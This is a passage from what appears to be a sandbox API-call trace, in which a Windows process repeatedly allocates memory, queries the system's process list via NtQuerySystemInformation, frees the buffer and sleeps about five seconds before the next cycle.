RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.022] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.022] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.024] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.024] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.029] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.029] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.032] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.032] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.033] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.033] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.033] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.039] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.042] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.042] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.043] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.046] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.047] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.055] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.055] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.058] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.059] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.059] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.059] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.063] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.063] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.068] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.072] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.074] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.074] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.078] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.079] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.083] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.083] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.086] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.087] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.089] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.089] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.089] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.090] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.090] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.093] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.094] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.096] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.096] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.096] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.099] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.100] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.111] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.116] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.116] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.120] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.120] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.123] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.124] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.126] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.127] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.131] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.132] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.138] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.139] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.140] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.141] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.145] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.146] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.148] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.148] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.153] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.155] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.156] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.160] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.168] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.170] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.170] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.171] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.171] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.171] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.174] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.175] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.177] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.177] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0xc0000004 [0218.177] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0218.178] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1e0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0218.178] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1e0000, ResultLength=0x0) returned 0x0 [0218.181] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1e0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0218.182] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0218.184] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1e0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0218.184] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1e0000, 